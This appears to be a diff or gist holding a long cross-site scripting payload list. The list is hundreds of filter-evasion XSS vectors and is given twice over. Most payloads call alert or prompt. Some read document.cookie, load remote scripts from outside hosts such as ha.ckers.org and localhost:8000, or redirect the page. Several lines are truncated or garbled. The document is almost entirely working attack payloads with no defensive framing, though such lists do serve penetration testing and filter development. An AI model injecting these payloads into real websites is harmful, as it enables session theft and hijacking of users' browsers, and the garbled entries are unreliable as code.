mstaack · February 3, 2016 16:55
diff --git a/xss b/xss
 "></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'">
 ';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT>
 ""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</
 h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$
 \';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88,
 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68),
 83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT>


 ';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){//
 '|alert('xss fired')|'
 '*prompt('localhost:8000
 <SCRIPT>alert('xss fired');</SCRIPT>
 "'/>><img+src=x onerror=prompt(/xss fired/)>
 --'">"/><sVG/*_*/R3NW4/OnLoaD="window['pr\u006fmp\u0074']/*/*/('XSS')";/>
 r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSS/)}
 ‘; alert(1); var foo=’
 <object data="javascript:alert('XSS')">
 <isindex type=image src=1 onerror=alert('XSS')>
 R3nw4_Kurdish_Hacker"><iframe/onload=alert('xss fired')>"><img src=x
 onerror=prompt('xss fired');>
 > \" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
 "><svg/onload=document.location.href='https://localhost'>
 R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
 <iframe
 src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
 11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'xss fired
 <img%09onerror=alert('xss fired') src=a>
 <i onclick=alert(1)>Click here</i>
 <h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"MK"\x29' >xxx <
 0xE + 0xF
 <title onpropertychange=javascript:alert('XSS')></title><title title=>
 <img language=vbs src=<b onerror=alert#1/1#>
 <img src="x:? title=" onerror=alert(1)//">
 <img src="x:gif" onerror="eval('al'%2b'lert(0)')">
 <img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
 data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
 data:text/html,<svg/onload=alert('xss fired')>
 javascript:"<script>alert(document.domain)</script>"
 <a href=[0x0b]" onclick=alert(1)//">click</a>
 <!-- --!><input value="--><body/onload=`alert(/ R3NW4 /)//`">
 <svg><script>/*&midast;&sol;alert(' R3NW4 ')&sol;&sol;*/</script></svg>
 R3NW4"><a onmouseover%3D"alert('xss fired')">R3NW4
 <script/%00%00v%00%00>alert(/R3NW4/)</script>
 <x/style="position:absolute;top:0;width:100%;height:100%"onwheel=alert&lpar;xss fired&rpar;>R3NW4
 <b "<script>alert(1)</script>">hola</b>
 '"--><*2f*style><*2f*scRipt><scRipt>alert('xss fired')<*2f*scRipt>
 /x"-prompt(/xss fired/)-"
 '+confirm(/xss fired/)+'
 <%tag style=”xss:expression(alert(123))”>
 </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 /R3nw4"><img src=x onerror=prompt('xss fired')>
 '></a></title><bod y onpageshow=prompt(/xss fired/)>
 ?r3nw4</script><svg/onload=alert(/xss fired/)//r3nw4
 \x3cscript src=https://localhost:8000/1.js\x3e\x3c/script\x3e
 @R3nw4<script>$='xss fired',alert($)< /script>-r3nw4/
 "--> </script><svg/onload=';alert(/xss fired/);'>
 %27%22%3E%3Csvg/onload=prompt%28/xss fired/%29%3E
 '"--></style></script>"'/>><img+src=x onerror=alert(/xss fired/)><h1>R3NW4
 "<img src=https://localhost:8000/1.js onerror=prompt('xss fired')><
 "><h1>R3NW4&lt;script&gt;alert(1)&lt;/script&gt;
 \x22\x3E\x3C\x2Fscript\x 3E\x3Cscript
 src\x3Dhttps\x3A\x2F\x2Flocalhost:8000\x2F1.js\x3E
 "><svg%2Fonload%3Dalert(%2Fxss fired%2F)>
 <h1>R3NW4<br><br><br><br><img src=x
 onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
 <svg•onload=alert(/xss fired/)>
 r3nw4"><svg onload=alert('xss fired')>
 "])},alert('xss fired'));(function xss() {//
 ""});});});alert('xss fired');$('a').each(function(i){$(this).click(function(event){x({y
 <svg onload=alert('xss fired')>
 "><h1/onmouseover='alert(/xss fired/)'>xss fired
 "+autofocus+onfocus%3D"alert('xss fired')
 </script>< img src=x onerror=alert(/xss fired/)><!--
 xss"/onmouseover="alert('XSSPosed')
 ">@r3nw4<svg%2Fonload%3Dalert(%2Fxss fired%2F)>
 %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
 '"><svg/onload=alert(/xss fired/)>
 "><img+src=a+onerror=prompt(/xss fired/)>
 r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/xss fired/)></
 "/><iframe/onload=prompt(/xss fired/)>
 <img src=x onerror=alert(/xss fired/)>
 "><img+src%3Dx+onerror%3Dprompt('xss fired')>
 "/onmouseover=alert(/xss fired/)>
 "onerror=alert(/xss fired/)>
 r3nw4-->hacker<svg/onload=alert('xss fired')//
 "";<%2Fscript><script>prompt(%2Fxss fired%2F)<%2Fscript><"
 "><--`<script>window.alert('localhost:8000script>--!>
 r3nw4\'); alert("xss fired");//
 "><script>setTimeout("alert(/xss fired/)",1000);</script><a x="
 <video onerror=alert(1337) </poster>
 <input onfocus=alert(1337) </autofocus>
 <img src=x:alert(alt) onerror=eval(src) alt=0>
 <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
 '"/>></script><script>alert("xss fired")</script>
 </script><img src=x onerror=while(true){prompt(/xss fired/)}>
 <img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>
 <script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
 <script </src="data:,1> (alert)(1337) "">
 <script src=data:;base64,YWxlcnQoMTMzNyk=>
 </title><script>alert(/xss fired/)</script>
 x");$=alert, $('xss fired');//
 '"/>></scr ipt><script>alert("xss fired")</script>
 #prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/xss fired/)>/
 #prettyPhoto[gallery]/1,<a onclick="alert(/xss fired/);">/
 "";</script><script>prompt(/xss fired/)</script><"
 -------------------------------------------------------------
 <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
 <BASE HREF="javascript:javascript:alert(1);//">
 <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
 <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
 name=url value=javascript:javascript:alert(1)></OBJECT>
 <HTML xmlns:xss><?import namespace="xss"
 implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML
 namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!--
 -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss"
 DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
 <HTML><BODY><?xml:namespace prefix="t"
 ns="urn:schemas-microsoft-com:time"><?import namespace="t"
 implementation="#default#time2"><t:set attributeName="innerHTML"
 to="XSS&lt;SCRIPT
 DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
 <SCRIPT SRC="%(jpg)s"></SCRIPT>
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
 charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
 <form id="test" /><button form="test"
 formaction="javascript:javascript:alert(1)">X
 <body
 onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input
 autofocus>
 <P STYLE="behavior:url('#default#time2')" end="0"
 onEnd="javascript:alert(1)">
 <STYLE>@import'%(css)s';</STYLE>
 <STYLE>a{background:url('s1' 's2)}@import
 javascript:javascript:alert(1);');}</STYLE>
 <meta charset=
 "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
 <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
 <style onreadystatechange=javascript:javascript:alert(1);></style>
 <?xml version="1.0"?><html:html
 xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
 <embed code=%(scriptlet)s></embed>
 <embed code=javascript:javascript:alert(1);></embed>
 <embed src=%(jscript)s></embed>
 <frameset onload=javascript:javascript:alert(1)></frameset>
 <object onerror=javascript:javascript:alert(1)>
 <embed type="image" src=%(scriptlet)s></embed>
 <XML ID=I><X><C><![CDATA[<IMG
 SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
 <IMG SRC=&{javascript:alert(1);};>
 <a href="jav&#65ascript:javascript:alert(1)">test1</a>
 <a href="jav&#97ascript:javascript:alert(1)">test1</a>
 <embed width=500 height=500
 code="data:text/html,<script>%(payload)s</script>"></embed>
 <iframe
 srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
 alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
 > </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 '';!--"<XSS>=&{()}
 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
 <IMG SRC="javascript:alert('XSS');">
 <IMG SRC=javascript:alert('XSS')>
 <IMG SRC=JaVaScRiPt:alert('XSS')>
 <IMG SRC=javascript:alert("XSS")>
 <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
 <a onmouseover="alert(document.cookie)">xxs link</a>
 <a onmouseover=alert(document.cookie)>xxs link</a>
 <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 <IMG SRC=# onmouseover="alert('xxs')">
 <IMG SRC= onmouseover="alert('xxs')">
 <script ^__^>alert(String.fromCharCode(49))</script ^__^

 </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script
 &#32;

 &#00;</form><input type&#61;"date" onfocus="alert(1)">

 <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>


 &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

 &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox &
 Opera}

 <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

 <div/style="width:expression(confirm(1))">X</div> {IE7}

 <iframe/%00/ src=javaSCRIPT&colon;alert(1)

 //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

 /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>

 </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

 <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

 </plaintext\></|\><plaintext/onmouseover=prompt(1)
 <var onmouseover="prompt(1)">On Mouse Over</var>

 <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click
 Here</a>

 <img src="/" =_=" title="onerror='prompt(1)'">

 <%<!--'%><script>alert(1);</script -->

 <script src="data:text/javascript,alert(1)"></script>

 <iframe/src \/\/onload = prompt(1)

 <iframe/onreadystatechange=alert(1)

 <svg/onload=alert(1)

 <input value=<><iframe/src=javascript:confirm(1)

 <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

 http://www.)</script .com

 <iframe
 src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>


 <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>


 <svg contentScriptType=text/vbs><script>MsgBox

 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

 <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>

 <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

 <script>++1-+?(1)</script>

 <body/onload=&lt;!--&gt;&#10alert(1)>

 <script itworksinallbrowsers>/*<script* */alert(1)</script

 <img src ?itworksonchrome?\/onerror = alert(1)

 <svg><script>//&NewLine;confirm(1);</script </svg>

 <svg><script onlypossibleinopera:-)> alert(1)

 <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
 href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

 <script x> alert</script 1=2

 <div/onmouseover='alert(1)'> style="x:">

 <--`<img/src=` onerror=alert(1)> --!>

 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

 <div style="position:absolute;top:0;left:0;width:100%;height:100%"
 onmouseover="prompt(1)" onclick="alert(1)">x</button>

 <form><button formaction=javascript&colon;alert(1)>CLICKME
	"></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'">
	';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT>
	""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</
	h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$
	\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88,
	115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68),
	83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT>


	';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){//
	'\|alert('xss fired')\|'
	'*prompt('localhost:8000
	<SCRIPT>alert('xss fired');</SCRIPT>
	"'/>><img+src=x onerror=prompt(/xss fired/)>
	--'">"/><sVG/_/R3NW4/OnLoaD="window['pr\u006fmp\u0074']///('XSS')";/>
	r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSS/)}
	‘; alert(1); var foo=’
	<object data="javascript:alert('XSS')">
	<isindex type=image src=1 onerror=alert('XSS')>
	R3nw4_Kurdish_Hacker"><iframe/onload=alert('xss fired')>"><img src=x
	onerror=prompt('xss fired');>
	> \" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
	"><svg/onload=document.location.href='https://localhost'>
	R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
	<iframe
	src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
	11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'xss fired
	<img%09onerror=alert('xss fired') src=a>
	<i onclick=alert(1)>Click here</i>
	<h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"MK"\x29' >xxx <
	0xE + 0xF
	<title onpropertychange=javascript:alert('XSS')></title><title title=>
	<img language=vbs src=<b onerror=alert#1/1#>
	<img src="x:? title=" onerror=alert(1)//">
	<img src="x:gif" onerror="eval('al'%2b'lert(0)')">
	<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
	data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
	data:text/html,<svg/onload=alert('xss fired')>
	javascript:"<script>alert(document.domain)</script>"
	<a href=[0x0b]" onclick=alert(1)//">click</a>
	<!-- --!><input value="--><body/onload=`alert(/ R3NW4 /)//`">
	<svg><script>/&midast;/alert(' R3NW4 ')///</script></svg>
	R3NW4"><a onmouseover%3D"alert('xss fired')">R3NW4
	<script/%00%00v%00%00>alert(/R3NW4/)</script>
	<x/style="position:absolute;top:0;width:100%;height:100%"onwheel=alert(xss fired)>R3NW4
	<b "<script>alert(1)</script>">hola</b>
	'"--><2fstyle><2fscRipt><scRipt>alert('xss fired')<2fscRipt>
	/x"-prompt(/xss fired/)-"
	'+confirm(/xss fired/)+'
	<%tag style=”xss:expression(alert(123))”>
	</XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	/R3nw4"><img src=x onerror=prompt('xss fired')>
	'></a></title><bod y onpageshow=prompt(/xss fired/)>
	?r3nw4</script><svg/onload=alert(/xss fired/)//r3nw4
	\x3cscript src=https://localhost:8000/1.js\x3e\x3c/script\x3e
	@R3nw4<script>$='xss fired',alert($)< /script>-r3nw4/
	"--> </script><svg/onload=';alert(/xss fired/);'>
	%27%22%3E%3Csvg/onload=prompt%28/xss fired/%29%3E
	'"--></style></script>"'/>><img+src=x onerror=alert(/xss fired/)><h1>R3NW4
	"<img src=https://localhost:8000/1.js onerror=prompt('xss fired')><
	"><h1>R3NW4<script>alert(1)</script>
	\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript
	src\x3Dhttps\x3A\x2F\x2Flocalhost:8000\x2F1.js\x3E
	"><svg%2Fonload%3Dalert(%2Fxss fired%2F)>
	<h1>R3NW4<br><br><br><br><img src=x
	onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
	<svg•onload=alert(/xss fired/)>
	r3nw4"><svg onload=alert('xss fired')>
	"])},alert('xss fired'));(function xss() {//
	""});});});alert('xss fired');$('a').each(function(i){$(this).click(function(event){x({y
	<svg onload=alert('xss fired')>
	"><h1/onmouseover='alert(/xss fired/)'>xss fired
	"+autofocus+onfocus%3D"alert('xss fired')
	</script>< img src=x onerror=alert(/xss fired/)><!--
	xss"/onmouseover="alert('XSSPosed')
	">@r3nw4<svg%2Fonload%3Dalert(%2Fxss fired%2F)>
	%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
	'"><svg/onload=alert(/xss fired/)>
	"><img+src=a+onerror=prompt(/xss fired/)>
	r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/xss fired/)></
	"/><iframe/onload=prompt(/xss fired/)>
	<img src=x onerror=alert(/xss fired/)>
	"><img+src%3Dx+onerror%3Dprompt('xss fired')>
	"/onmouseover=alert(/xss fired/)>
	"onerror=alert(/xss fired/)>
	r3nw4-->hacker<svg/onload=alert('xss fired')//
	"";<%2Fscript><script>prompt(%2Fxss fired%2F)<%2Fscript><"
	"><--`<script>window.alert('localhost:8000script>--!>
	r3nw4\'); alert("xss fired");//
	"><script>setTimeout("alert(/xss fired/)",1000);</script><a x="
	<video onerror=alert(1337) </poster>
	<input onfocus=alert(1337) </autofocus>
	<img src=x:alert(alt) onerror=eval(src) alt=0>
	<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
	'"/>></script><script>alert("xss fired")</script>
	</script><img src=x onerror=while(true){prompt(/xss fired/)}>
	<img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>
	<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
	<script </src="data:,1> (alert)(1337) "">
	<script src=data:;base64,YWxlcnQoMTMzNyk=>
	</title><script>alert(/xss fired/)</script>
	x");$=alert, $('xss fired');//
	'"/>></scr ipt><script>alert("xss fired")</script>
	#prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/xss fired/)>/
	#prettyPhoto[gallery]/1,<a onclick="alert(/xss fired/);">/
	"";</script><script>prompt(/xss fired/)</script><"
	-------------------------------------------------------------
	<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
	<BASE HREF="javascript:javascript:alert(1);//">
	<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
	<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
	name=url value=javascript:javascript:alert(1)></OBJECT>
	<HTML xmlns:xss><?import namespace="xss"
	implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML
	namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!--
	-->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss"
	DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
	<HTML><BODY><?xml:namespace prefix="t"
	ns="urn:schemas-microsoft-com:time"><?import namespace="t"
	implementation="#default#time2"><t:set attributeName="innerHTML"
	to="XSS<SCRIPT
	DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
	<SCRIPT SRC="%(jpg)s"></SCRIPT>
	<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
	charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
	<form id="test" /><button form="test"
	formaction="javascript:javascript:alert(1)">X
	<body
	onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input
	autofocus>
	<P STYLE="behavior:url('#default#time2')" end="0"
	onEnd="javascript:alert(1)">
	<STYLE>@import'%(css)s';</STYLE>
	<STYLE>a{background:url('s1' 's2)}@import
	javascript:javascript:alert(1);');}</STYLE>
	<meta charset=
	"x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
	<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
	<style onreadystatechange=javascript:javascript:alert(1);></style>
	<?xml version="1.0"?><html:html
	xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
	<embed code=%(scriptlet)s></embed>
	<embed code=javascript:javascript:alert(1);></embed>
	<embed src=%(jscript)s></embed>
	<frameset onload=javascript:javascript:alert(1)></frameset>
	<object onerror=javascript:javascript:alert(1)>
	<embed type="image" src=%(scriptlet)s></embed>
	<XML ID=I><X><C><![CDATA[<IMG
	SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
	<IMG SRC=&{javascript:alert(1);};>
	<a href="jav&#65ascript:javascript:alert(1)">test1</a>
	<a href="jav&#97ascript:javascript:alert(1)">test1</a>
	<embed width=500 height=500
	code="data:text/html,<script>%(payload)s</script>"></embed>
	<iframe
	srcdoc="&LT;iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
	alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
	> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=JaVaScRiPt:alert('XSS')>
	<IMG SRC=javascript:alert("XSS")>
	<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
	<a onmouseover="alert(document.cookie)">xxs link</a>
	<a onmouseover=alert(document.cookie)>xxs link</a>
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	<IMG SRC=# onmouseover="alert('xxs')">
	<IMG SRC= onmouseover="alert('xxs')">
	<script ^__^>alert(String.fromCharCode(49))</script ^__^

	</style ><script :-(>//alert(document.location)//</script


	</form><input type="date" onfocus="alert(1)">

	<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>


	"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

	<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox &
	Opera}

	<marquee onstart='javascript:alert(1)'>^__^

	<div/style="width:expression(confirm(1))">X</div> {IE7}

	<iframe/%00/ src=javaSCRIPT&colon;alert(1)

	//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

	/iframe/src/<iframe/src="<iframe/src=@"/onload=prompt/iframe/src/>

	</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

	<a/href="javascript: javascript:prompt(1)"><input type="X">

	</plaintext\></\|\><plaintext/onmouseover=prompt(1)
	<var onmouseover="prompt(1)">On Mouse Over</var>

	<a href=javascript&colon;alert(document&period;cookie)>Click
	Here</a>

	<img src="/" =_=" title="onerror='prompt(1)'">

	<%<!--'%><script>alert(1);</script -->

	<script src="data:text/javascript,alert(1)"></script>

	<iframe/src \/\/onload = prompt(1)

	<iframe/onreadystatechange=alert(1)

	<svg/onload=alert(1)

	<input value=<><iframe/src=javascript:confirm(1)

	<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

	http://www.)</script .com

	<iframe
	src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>


	<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>


	<svg contentScriptType=text/vbs><script>MsgBox

	<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

	<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>

